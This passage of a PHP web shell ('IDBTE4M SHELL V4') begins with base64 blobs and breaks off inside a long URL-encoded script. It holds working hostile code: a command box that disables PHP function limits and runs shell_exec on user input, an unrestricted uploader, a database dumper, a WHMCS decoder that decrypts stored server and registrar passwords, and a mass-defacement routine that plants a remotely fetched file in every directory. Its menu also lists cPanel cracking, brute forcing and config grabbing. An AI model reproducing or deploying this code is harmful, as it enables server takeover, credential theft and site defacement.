zs7Uno6SjyaKqSe7LteGLGRrAKhIED9iXlND/pxRvijivtWBFhu9Rje97i1K7QduaPXQ+0+ofY0u+1c4yW3AgyfkI6rSoWovE8ZpApSfApNuXuCf29dfVuRLsPUfSiFdIxNBu8MQGK5JUt8tSn1FFigGkCGUPPXPCbuvxJvRLzkUSu2SwFM7pNv5S6AV4R/ury8HVqa7vjVQzjOUBmoayk5GWa1AT8MCWMpizECPH6yeBWqGVeYayWyqZj2ZKrUoMokrUlUBzpP9+ipAd9RiAh07pF8ogJ4n4b/MoKkgrqKShScdHySHcnrXZIRQIpXRaoipHsxeo6wfTAqhqcttMKuvpiO7jKUjN5/wcB5BE+TQJ4yUWWAJkhJ8M1tKIallBDSGAYIsrrgtAwUMEy9iQf2iMZeGnggRNUxZxQW1QWtO6JuczJU6WNO3/nF/FvFHXd5TQihumxDkq6qZOpP8r5rf+sZklV4hmXKkfMvhBjaHUqYhOAjlMD4p0AFGW45HEvGNRZrynRJruZtQVjSf/DzW1jvoLpzvG6jWPWkWQf9ClTREdZpNLZQ+5f+z1/9w9qr/tcPX6dbhCzYhfEnSh2E/y00rrVwK2dbNyYqdcFoAhXS3Iv6kYAU/W/Bx2srBwWd5r11x2qT9M7WTxmZhYRZ808965rXLn63bQPAZ3Y9LzHB8pKPfkFc7NZot/C67KS79mM2+0FiD52yDcGYcrSTpCz0azzyRt5BikDFNXjwmSzIRxyhXOJZms+OtYwngVfqD0WA5BhXxS+bagr7xX+p266Xst6A/j0tybEA7Pmke10O3E3ohbxpjTmlgtGzK9Szt04jG1Wp1ZeDezxPk3AfVL3pJXMUKWTqA6zeYzSuTBsp6Uflm9nQtdSblZj6fVzVeFZwgFGy0MGMWjLO3w/KzHuene1xjL1UuhxyETVMJdumIOJQ329eV9u0rN/QJC2pNUNAr2S/7oUubtVcwy8aQ+2u5GyzVxkYo5xWgClMb9Um++HvCre7Hi6fEjE+mx1omw+W1VHJa2uoyygAIo+4Uofy7j3T/O/ViuosOQ73LUX3fbucdyzsYr3vGig/DbY3WmIzJf+2+TmgTRP4gyIfWgXgNdLDfb2kRD6VNZ4lGroc7lDbaHH4y+rzBdnL6oVHgkdghec+mBEQXTbDsymsw+fP9Pw==";
  514. $jumper="fVJtb5swEP4rF4Rko7Ka7WMCpFLVfp20fWwrarA9PAFGtlmXVfvvuwtN1mjShEDmebl77kB3vYOkjLIdNHSDDKF6TLpRte7nY1KX0eOtoHNDmOWE1CdEkx3wNIxQgZ1s801HzoI0uhmd0iyDqoIigz2sEuaMYVtQVvPkznvnt/D1JEb681SKqGp8eHpQjLpU9sc5y3d5kJREIFgn2Q6Cjk20o24GO9rIC4Ru0hnFLwrrGTfriTOhYydWkOXMMxRZA3zzJszglRIBTx4+PMExFmzh1i1qeo7wRUsF7yr8m5By/IZ0XlpsKb2XB45IugTtwwXSuclcABbfih289HbQfGO0M/yUKXvFlUVPQ+BOwxlfo6Ozho9FQarZURfU4oGTJ2dbdgowyZEWG5YWiZUtcrKQQFn/iz6K6N2oBbs+O66ZwGkG2zV9HAfB1qb8b8UNuhhlJNyGxuOSaBf8WJOI45DNvIR+tYX87MbW71nslK82WiNdqb26orNxWLfr4a0CyLAOheU1/ans4d4tk4LNE5QSeq9NlewP1cU4l6Mk9X9IUQpZl62vGTXf138A";
  515. ?>
  516. <html><head><link rel="SHORTCUT ICON" href="http://kefiex.yu.tl/files/bnx.png"><title>-=[ IDBTE4M SHELL V4 ]=-</title>
  517. <script type="text/javascript">
  518. function tukar(lama,baru){
  519.     document.getElementById(lama).style.display = 'none';
  520.     document.getElementById(baru).style.display = 'block';
  521. }
  522. </script>
  523. <style type="text/css">
  524. body{
  525.     background:#000000;;
  526. }
  527. a {
  528. text-decoration:none;
  529. }
  530. a:hover{
  531. border-bottom:1px solid #FF0000;
  532. }
  533. *{
  534.     font-size:11px;
  535.     font-family:Tahoma,Verdana,Arial;
  536.     color:#FFFFFF;
  537. }
  538. #menu{
  539.     background:#000000;
  540.     margin:8px 2px 4px 2px;
  541.    
  542. }
  543. #menu a{
  544.     padding:4px 18px;
  545.     margin:0;
  546.     background:#c40909;
  547.     text-decoration:none;
  548.     letter-spacing:2px;
  549.     -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  550. }
  551. #menu a:hover{
  552.     background:#6a0707;
  553.     border-bottom:1px solid #c40909;
  554.     border-top:1px solid #c40909;
  555. }
  556. .tabnet{
  557.     margin:15px auto 0 auto;
  558.     border: 1px solid #c40909;
  559. }
  560. .main {
  561.     width:100%;
  562. }
  563. .gaya {
  564.     color: #FF0000;
  565. }
  566. .inputz{
  567.     background:#6a0707;
  568.     border:0;
  569.     padding:2px;
  570.     border-bottom:1px solid #c40909;
  571.     border-top:1px solid #c40909;
  572. }
  573. .inputzbut{
  574.     background:#6a0707;
  575.     color:#ff000;
  576.     margin:0 4px;
  577.     border:1px solid #444444;
  578.  
  579. }
  580. .inputz:hover, .inputzbut:hover{
  581.     border-bottom:1px solid #FF0000;
  582.     border-top:1px solid #FF0000;
  583. }
  584. .output {
  585.     margin:auto;
  586.     border:1px solid #FF0000;
  587.     width:100%;
  588.     height:400px;
  589.     background:#000000;
  590.     padding:0 2px;
  591. }
  592. .cmdbox{
  593.     width:100%;
  594. }
  595. .head_info{
  596.     padding: 0 4px;
  597.     float:center;
  598. }
  599. .jaya{ font-family: ;}
  600.  
  601. .b374k{
  602.     font-size:30px;
  603.     padding:0;
  604.     color:#444444;
  605. }
  606. .b374k_tbl{
  607.     text-align:center;
  608.     margin:0 4px 0 0;
  609.     padding:0 4px 0 0;
  610.     border-right:1px solid #c40909;
  611. }
  612. .phpinfo table{
  613.     width:100%;
  614.     padding:0 0 0 0;
  615. }
  616. .phpinfo td{
  617.     background:#6a0707;
  618.     color:#cccccc;
  619. padding:6px 8px;;
  620. }
  621. .phpinfo th, th{
  622.     background:#6a0707;
  623.     border-bottom:1px solid #c40909;
  624. font-weight:normal;
  625. }
  626. .phpinfo h2, .phpinfo h2 a{
  627.     text-align:center;
  628.     font-size:16px;
  629.     padding:0;
  630.     margin:30px 0 0 0;
  631.     background:#c40909;
  632.     padding:4px 0;
  633. }
  634. .explore{
  635. width:100%;
  636. }
  637. .explore a {
  638. text-decoration:none;
  639. }
  640. .explore td{
  641. border-bottom:1px solid #c40909;
  642. padding:0 8px;
  643. line-height:24px;
  644. }
  645. .explore th{
  646. padding:3px 8px;
  647. font-weight:normal;
  648. }
  649. .explore th:hover , .phpinfo th:hover{
  650. border-bottom:1px solid #FF0000;
  651. }
  652. .explore tr:hover{
  653. background:#6a0707;
  654. }
  655. .viewfile{
  656. background:#EDECEB;
  657. color:#000000;
  658. margin:4px 2px;
  659. padding:8px;
  660. }
  661. .sembunyi{
  662. display:none;
  663. padding:0;margin:0;
  664. }
  665.  
  666. </style></head>
  667. <body onLoad="document.getElementById('cmd').focus();">
  668. <div class="main">
  669. <!-- head info start here -->
  670. <div class="head_info">
  671. <table ><tr>
  672. <td><table class="b374k_tbl"><tr><td><a href="?<?php echo "y=".$pwd; ?>&amp;x=about"><span class="b374k"><img src="http://kefiex.yu.tl/files/bnx.png" /></span></a></td></tr><br>
  673. <div id="menu" align="left">
  674. <form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
  675. <td><!-- onMouseOver="this.focus();" --><nobr><input type="file" name="file" class="inputz" size="50">
  676. <input name="_upl" type="submit" id="_upl" class="inputz" value="Upload"></form></div></b></td></tr></table></td>
  677. <td><?php echo $buff; ?></td>
  678. </td>
  679. </tr>
  680. </tr></table>
  681. </div>
  682. <div id="menu" align="center">
  683.  
  684. <font color=red size=2 face="TAHOMA">
  685. <p align="center" dir="ltr"> <hr><center>
  686. <font color="red" font size=3 > | <font color="white" font size=3 >
  687. <a href="?" style="text-decoration: none">
  688. Home </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
  689. <a href="?jak=sql" style="text-decoration: none">
  690. SQL </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
  691. <a href="?jak=cp" style="text-decoration: none">
  692. Cpanel Cracker </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
  693. <a href="?jak=jump" style="text-decoration: none">
  694. Jumping </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
  695. <a href="?x=maling" style="text-decoration: none">
  696. Maling Script </a> <font color="white" font size=3 ></font>
  697. <font color="red" font size=3 > |</font>
  698. <br><hr><center>
  699. <font color="red" font size=3 > |</font>
  700. <a href="?jak=auto" style="text-decoration: none">
  701. Auto Wget </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
  702. <a href="?jak=config" style="text-decoration: none">
  703. Config Grabber </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
  704. <a href="?jak=wp2" style="text-decoration: none">
  705. Config Auto Get </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
  706. <a href="?jak=zonh" style="text-decoration: none">
  707. Zon-H </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
  708. <a href="?jak=mass" style="text-decoration: none">
  709. Mass Deface </a> <font color="white" font size=3 ></font>
  710. <font color="red" font size=3 >|</font>
  711. <hr>
  712. <font color="red" font size=3 >|</font>
  713. <a href="?jak=brute" style="text-decoration: none">
  714. Cp Brute </a> <font color="white" font size=3 ></font>
  715. <font color="red" font size=3 >|</font>
  716. <a href="?jak=finder" style="text-decoration: none">
  717. Admin Finder </a> <font color="white" font size=3 ></font>
  718. <font color="red" font size=3 > |</font>
  719. <a href="?jak=sym" style="text-decoration: none">
  720. Symlink </a> <font color="white" font size=3 ></font>
  721. <font color="red" font size=3 > |</font>
  722. <a href="?jak=dump" style="text-decoration: none">
  723. Db Dump </a> <font color="white" font size=3 ></font>
  724. <font color="red" font size=3 > |</font>
  725. <a href="?jak=has" style="text-decoration: none">
  726. Password Hash </a> <font color="white" font size=3 ></font>
  727. <font color="red" font size=3 > |</font>
  728. <a href="?jak=whmcs" style="text-decoration: none">
  729. Whmcs Decoder </a> <font color="white" font size=3 ></font>
  730. <font color="red" font size=3 > |</font>
  731. <a href="?jak=wpp" style="text-decoration: none">
  732. Wp Mass </a> <font color="white" font size=3 ></font>
  733. <font color="red" font size=3 > |</font>
  734. <hr>
  735. <font color="red" font size=3 >|</font>
  736. <a href="?jak=jomla" style="text-decoration: none">
  737. Jomla  Mass </a> <font color="white" font size=3 ></font>
  738. <font color="red" font size=3 > |</font>
  739. <a href="?jak=wpmas" style="text-decoration: none">
  740. Wp Mass Manual </a> <font color="white" font size=3 ></font>
  741. <font color="red" font size=3 > |</font>
  742. </td><hr></center>
  743. </tr></table></div>
  744.  
  745. <div id="viewfile" align="left">
  746. <form method="post">
  747. <td><nobr><b>CMD</b></nobr></td>
  748. <td><!-- onMouseOver="this.focus();" --><nobr><input id="cmd" class="inputz" type="text" name="cmd" style="width:300px;" value="" />
  749. <input class="inputzbut" type="submit" value=" >> " style="width:50px;" />
  750. </form>
  751.  
  752.  
  753. <?php
  754. if( $_POST['_upl'] == "Upload" ) {
  755.         if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
  756.         else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
  757. }
  758. ?>
  759. <?php
  760. /*******************************************\
  761. |        CMD linux DTT 2014
  762.  
  763. \*******************************************/
  764. $x0f = "fopen";
  765. $x10 = "fwrite";
  766. $x11 = "function_exists";
  767. $x12 = "shell_exec";
  768. if (isset($_POST['cmd'])) {
  769.     $x0b = $x0f('php.ini', 'w');
  770.     $x0c = " disable_functions=none ";
  771.     $x10($x0b, $x0c);
  772.     if ($x11('shell_exec')) {
  773.         $x0d = $_POST['cmd'];
  774.         $x0e = $x12("$x0d");
  775.         echo "<div id=result>";
  776.         echo "<span class=Y><pre>$x0e</pre></span";
  777.     }
  778.     echo "</div>";
  779. }
  780. ?>
  781. <center>
  782. <div id="menu" align="center">
  783. <?php
  784. if (isset($_GET['jak']) && ($_GET['jak'] == 'dump')) { ?>
  785. <form action="?jak=dump" method="post">
  786. <?php
  787. echo $head.'<p align="center">';
  788. echo '
  789. <table width=371 class=tabnet >
  790. <tr><th colspan="2">Database Dump</th></tr>
  791. <tr>
  792.     <td>Server </td>
  793.     <td><input class="inputz" type=text name=server size=52></td></tr><tr>
  794.     <td>Username</td>
  795.     <td><input class="inputz" type=text name=username size=52></td></tr><tr>
  796.     <td>Password</td>
  797.     <td><input class="inputz" type=text name=password size=52></td></tr><tr>
  798.     <td>DataBase Name</td>
  799.     <td><input class="inputz" type=text name=dbname size=52></td></tr>
  800.     <tr>
  801.     <td>DB Type </td>
  802.     <td><form method=post action="'.$me.'">
  803.     <select class="inputz" name=method>
  804.         <option  value="gzip">Gzip</option>
  805.         <option value="sql">Sql</option>
  806.         </select>
  807.     <input class="inputzbut" type=submit value="  Dump!  " ></td></tr>
  808.     </form></center></table>';
  809. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
  810. $date = date("Y-m-d");
  811. $dbserver = $_POST['server'];
  812. $dbuser = $_POST['username'];
  813. $dbpass = $_POST['password'];
  814. $dbname = $_POST['dbname'];
  815. $file = "Dump-$dbname-$date";
  816. $method = $_POST['method'];
  817. if ($method=='sql'){
  818. $file="Dump-$dbname-$date.sql";
  819. $fp=fopen($file,"w");
  820. }else{
  821. $file="Dump-$dbname-$date.sql.gz";
  822. $fp = gzopen($file,"w");
  823. }
  824. function write($data) {
  825. global $fp;
  826. if ($_POST['method']=='ssql'){
  827. fwrite($fp,$data);
  828. }else{
  829. gzwrite($fp, $data);
  830. }}
  831. mysql_connect ($dbserver, $dbuser, $dbpass);
  832. mysql_select_db($dbname);
  833. $tables = mysql_query ("SHOW TABLES");
  834. while ($i = mysql_fetch_array($tables)) {
  835.     $i = $i['Tables_in_'.$dbname];
  836.     $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  837.     write($create['Create Table'].";\n\n");
  838.     $sql = mysql_query ("SELECT * FROM ".$i);
  839.     if (mysql_num_rows($sql)) {
  840.         while ($row = mysql_fetch_row($sql)) {
  841.             foreach ($row as $j => $k) {
  842.                 $row[$j] = "'".mysql_escape_string($k)."'";
  843.             }
  844.             write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
  845.         }
  846.     }
  847. }
  848. if ($method=='ssql'){
  849. fclose ($fp);
  850. }else{
  851. gzclose($fp);}
  852. header("Content-Disposition: attachment; filename=" . $file);  
  853. header("Content-Type: application/download");
  854. header("Content-Length: " . filesize($file));
  855. flush();
  856.  
  857. $fp = fopen($file, "r");
  858. while (!feof($fp))
  859. {
  860.     echo fread($fp, 65536);
  861.     flush();
  862. }
  863. fclose($fp);
  864. }
  865.  
  866. }
  867. elseif(isset($_GET['jak']) && ($_GET['jak'] == 'has'))
  868.     {
  869. $submit= $_POST['enter'];
  870. if (isset($submit)) {
  871. $pass = $_POST['password']; // password
  872. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
  873. $hash = md5($pass); // md5 hash #1
  874. $md4 = hash("md4",$pass);
  875. $hash_md5 = md5($salt.$pass); // md5 hash with salt #2
  876. $hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
  877. $hash1 = sha1($pass); // sha1 hash #4
  878. $sha256 = hash("sha256",$text);
  879. $hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
  880. $hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
  881. }
  882. echo '<form action="" method="post"><b><table class=tabnet>';
  883. echo '<tr><th colspan="2">Password Hash</th></center></tr>';
  884. echo '<tr><td><b>Enter the word you want to encrypt:</b></td>';
  885. echo '<td><input class="inputz" type="text" name="password" size="40" />';
  886. echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
  887. echo '</td></tr><br>';
  888. echo '<tr><th colspan="2">Hash Result</th></center></tr>';
  889. echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>';
  890. echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>';
  891. echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>';
  892. echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>';
  893. echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
  894. echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>';
  895. echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>';
  896. echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>';
  897. echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>';
  898. }
  899. elseif(isset($_GET['jak']) && ($_GET['jak'] == 'whmcs'))
  900. {  
  901. ?>
  902. <form action="?y=<?php echo $pwd; ?>&amp;jak=whmcs" method="post">
  903.  
  904. <?php
  905.  
  906. function decrypt ($string,$cc_encryption_hash)
  907. {
  908.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  909.     $hash_key = _hash ($key);
  910.     $hash_length = strlen ($hash_key);
  911.     $string = base64_decode ($string);
  912.     $tmp_iv = substr ($string, 0, $hash_length);
  913.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  914.     $iv = $out = '';
  915.     $c = 0;
  916.     while ($c < $hash_length)
  917.     {
  918.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  919.         ++$c;
  920.     }
  921.     $key = $iv;
  922.     $c = 0;
  923.     while ($c < strlen ($string))
  924.     {
  925.         if (($c != 0 AND $c % $hash_length == 0))
  926.         {
  927.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  928.         }
  929.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  930.         ++$c;
  931.     }
  932.     return $out;
  933. }
  934.  
  935. function _hash ($string)
  936. {
  937.     if (function_exists ('sha1'))
  938.     {
  939.         $hash = sha1 ($string);
  940.     }
  941.     else
  942.     {
  943.         $hash = md5 ($string);
  944.     }
  945.     $out = '';
  946.     $c = 0;
  947.     while ($c < strlen ($hash))
  948.     {
  949.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  950.         $c += 2;
  951.     }
  952.     return $out;
  953. }
  954.  
  955. echo "
  956. <br><center><font size='5' color='#FF0000'><b>--==[ WHMCS Decoder ]==--</b></font></center>
  957. <center>
  958. <br>
  959.  
  960. <FORM action=''  method='post'>
  961. <input type='hidden' name='form_action' value='2'>
  962. <br>
  963. <table class=tabnet style=width:320px;padding:0 1px;>
  964. <tr><th colspan=2>WHMCS Decoder</th></tr>
  965. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  966. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  967. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
  968. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  969. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
  970. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
  971. </table>
  972. </FORM>
  973. </center>
  974. ";
  975.  
  976.  if($_POST['form_action'] == 2 )
  977.  {
  978.  //include($file);
  979.  $db_host=($_POST['db_host']);
  980.  $db_username=($_POST['db_username']);
  981.  $db_password=($_POST['db_password']);
  982.  $db_name=($_POST['db_name']);
  983.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
  984.  
  985.  
  986.  
  987.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  988.         mysql_select_db($db_name,$link) ;
  989. $query = mysql_query("SELECT * FROM tblservers");
  990. while($v = mysql_fetch_array($query)) {
  991. $ipaddress = $v['ipaddress'];
  992. $username = $v['username'];
  993. $type = $v['type'];
  994. $active = $v['active'];
  995. $hostname = $v['hostname'];
  996. echo("<center><table border='1'>");
  997. $password = decrypt ($v['password'], $cc_encryption_hash);
  998. echo("<tr><td>Type</td><td>$type</td></tr>");
  999. echo("<tr><td>Active</td><td>$active</td></tr>");
  1000. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  1001. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  1002. echo("<tr><td>Username</td><td>$username</td></tr>");
  1003. echo("<tr><td>Password</td><td>$password</td></tr>");
  1004.  
  1005. echo "</table><br><br></center>";
  1006. }
  1007.  
  1008.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  1009.         mysql_select_db($db_name,$link) ;
  1010. $query = mysql_query("SELECT * FROM tblregistrars");
  1011. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
  1012. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  1013. while($v = mysql_fetch_array($query)) {
  1014. $registrar     = $v['registrar'];
  1015. $setting = $v['setting'];
  1016. $value = decrypt ($v['value'], $cc_encryption_hash);
  1017. if ($value=="") {
  1018. $value=0;
  1019. }
  1020. $password = decrypt ($v['password'], $cc_encryption_hash);
  1021. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  1022. }
  1023. }
  1024. }
  1025.  
  1026. ?>
  1027. <?php
  1028. if (isset($_GET['jak']) && ($_GET['jak'] == 'mass')) { ?>
  1029. <form action="?jak=mass" method="post">
  1030. <?php ?>
  1031. <html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
  1032.  
  1033. <p class="style3">
  1034.  
  1035. <span <ul>
  1036.  
  1037.     <span class="style32">
  1038.     <span class="style39">
  1039. <span style="font-weight: 700;" class="style33">
  1040.     </span></p><br>
  1041. <span style="font-weight: 700;" class="style33">
  1042.     <font class="hk" style="text-shadow: 2px 2px 3px rgb(0, 0, 0);"><br>
  1043. <br>
  1044. </center>
  1045. <div class="style31">
  1046. <center>
  1047. <form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
  1048. <div class="style31">
  1049. [+] Main Directory: <input type='text' style='width: 250px' value='<?php echo getcwd() . "/"; ?>' name='massdefacedir'>
  1050. [+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
  1051. <input type='submit' name='execmassdeface' value='Execute'></div>
  1052. </form></td></center>
  1053. <?php
  1054. echo "<center><textarea rows='10' cols='100'>";
  1055. $defaceurl = $_POST['massdefaceurl'];
  1056. $dir = $_POST['massdefacedir'];
  1057. echo $dir . "
  1058. ";
  1059. if (is_dir($dir)) {
  1060.     if ($dh = opendir($dir)) {
  1061.         while (($file = readdir($dh)) !== false) {
  1062.             if (filetype($dir . $file) == "dir") {
  1063.                 $newfile = $dir . $file . "/jek.php";
  1064.                 echo $newfile . "
  1065. ";
  1066.                 if (!copy($defaceurl, $newfile)) {
  1067.                     echo "failed to copy $file...
  1068. ";
  1069.                 }
  1070.             }
  1071.         }
  1072.         closedir($dh);
  1073.     }
  1074. }
  1075. echo "</textarea></center>";
  1076. }
  1077. ?>
  1078. <?php
  1079. // SHELL IDBTE4M V2
  1080. // BY ./KEFIEX404 IDBTE4M
  1081. set_time_limit(0);
  1082. error_reporting(0);
  1083.  
  1084. $htcs = "
  1085. <html>
  1086. <head>
  1087. <!-- SEO Meta Tag -->
  1088. <meta content='Hacked By JakRapp' name='description'/>
  1089. <meta content='Hacked By JakRapp, Tested By JakRapp, JakRapp Was Here, wned By JakRapp, JakRapp Come Back, Security By JakRapp, Tusboled By JakRapp, Anon JakRapp, Hacker JakRapp, Haxor JakRapp, JakRapp One Comando, sabun by jakrapp, JakRapp Defacer, Deface By JakRapp' name='keywords'/>
  1090. <meta content='index,follow' name='robots'/>
  1091. <meta content='text/html;charset=UTF-8' http-equiv='Content-Type'/>
  1092. <meta content='website' name='generator'/>
  1093. <meta content='general' name='rating'/>
  1094. <!-- SEO Title Tag -->
  1095. <title>Hacked By JakRapp</title>
  1096. <link href='http://www.jakrapp.com/favicon.ico' rel='icon' type='image/x-icon'/>
  1097. <meta content='text/html;charset=UTF-8' http-equiv='Content-Type'/>
  1098. <meta content='IE=edge,chrome=1' http-equiv='X-UA-Compatible'/>
  1099. <meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
  1100. <meta content='Hacked By JakRapp' name='description'/>
  1101. <script src='http://code.jquery.com/jquery-latest.min.js'></script>
  1102.  
  1103. <style>
  1104. body{
  1105. font-family: 'courier new';
  1106. font-size:80%;
  1107. color: #28FE14;
  1108. background: url('http://2.bp.blogspot.com/-LPgZM8E1nKE/VA_RSPtWNvI/AAAAAAAAAu4/Dzs4tTNniFw/s1600/1w2w3.png') center fixed;
  1109. background-size: cover;
  1110. -webkit-background-size: cover;
  1111. -moz-background-size: cover;
  1112. -o-background-size: cover;
  1113. }
  1114. }
  1115.  
  1116. .xBody{
  1117. width:660px;
  1118. height:450px;
  1119. position:absolute;
  1120. z-index: 9;
  1121. }
  1122. .ssh{
  1123. display:none;
  1124. z-index: 9;
  1125. }
  1126. .sshBox{
  1127. height:300px;
  1128. border: 4px solid white;
  1129.        -moz-border-radius: 4px;
  1130.        -webkit-border-radius: 4px;
  1131.        -o-border-radius: 4x;
  1132.        -khtml-border-radius: 4px;
  1133.        border-radius: 4px;
  1134.        z-index: 9;
  1135. }
  1136. .sshHead{
  1137. margin-bottom: 5px;
  1138. color:black;
  1139. font-weight: bold;
  1140. background-color: white;
  1141. height:20px;
  1142. z-index: 9;
  1143.  
  1144. }
  1145.  
  1146. .greenBox{
  1147. padding-left: 3px;
  1148. position: absolute;
  1149. height:22px;
  1150. border: 1px solid #28FE14;
  1151. z-index: 9;
  1152. }
  1153. .picz{
  1154. position: absolute;
  1155. width:500px;
  1156. height:80%;
  1157. display:none;
  1158. right:2px;
  1159. top:2px;
  1160. }
  1161. #mg img:hover {
  1162. -webkit-animation:tremer 0.5s linear infinite;
  1163. -moz-animation:tremer 0.5s linear infinite;
  1164. -o-animation:tremer 0.5s linear infinite;
  1165. animation:tremer 0.5s linear infinite;
  1166. }
  1167. .neon{<!--coleur lootz-->
  1168. color:blue;
  1169. text-shadow: 0 0 5px red,0 0 10px red, 0 0 30px orange, 0 0 45px yellow, 0 0 60px red;
  1170. }
  1171. .like{border:4px double yellow;
  1172. box-shadow:0px 2px 20px white;
  1173. border-radius:10px;
  1174. padding:9px;
  1175. height:310px;}
  1176. #mg img{border:4px double yellow;
  1177.  
  1178. border-radius:10px;
  1179. opacity:0.75;
  1180. -moz-opacity: 0.75;
  1181. filter: alpha(opacity=75);
  1182. }
  1183. </style>
  1184. </head>
  1185. <body onselectstart='return false' ondragstart='return false' oncontextmenu='return false' onLoad='writetext()'>
  1186. <Script Language='Javascript'>
  1187. <!-- Lol Many scripts -->
  1188. <!--
  1189. document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74%69%6F%6E%20%62%79%20%4D%61%72%6B%65%74%61%63%74%69%63%6F%2E%63%6F%6D%20%2D%2D%3E%0A%3C%21%2D%2D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%25%33%43%25%35%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%30%25%34%43%25%36%31%25%36%45%25%36%37%25%37%35%25%36%31%25%36%37%25%36%35%25%33%44%25%32%37%25%34%41%25%36%31%25%37%36%25%36%31%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%37%25%33%45%25%30%41%25%33%43%25%32%31%25%32%44%25%32%44%25%32%30%25%34%38%25%35%34%25%34%44%25%34%43%25%32%30%25%34%35%25%36%45%25%36%33%25%37%32%25%37%39%25%37%30%25%37%34%25%36%39%25%36%46%25%36%45%25%32%30%25%36%32%25%37%39%25%32%30%25%34%44%25%36%31%25%37%32%25%36%42%25%36%35%25%37%34%25%36%31%25%36%33%25%37%34%25%36%39%25%36%33%25%36%46%25%32%45%25%36%33%25%36%46%25%36%44%25%32%30%25%32%44%25%32%44%25%33%45%25%30%41%25%33%43%25%32%31%25%32%44%25%32%44%25%30%41%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%32%38%25%37%35%25%36%45%25%36%35%25%37%33%25%36%33%25%36%31%25%37%30%25%36%35%25%32%38%25%32%37%25%32%35%25%33%33%25%34%33%25%32%35%25%33%36%25%33%32%25%32%35%25%33%36%25%34%36%25%32%35%25%33%36%25%33%34%25%32%35%25%33%37%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%34%36%25%32%35%25%33%36%25%34%35%25%32%35%25%33%36%25%34%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%34%36%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%34%35%25%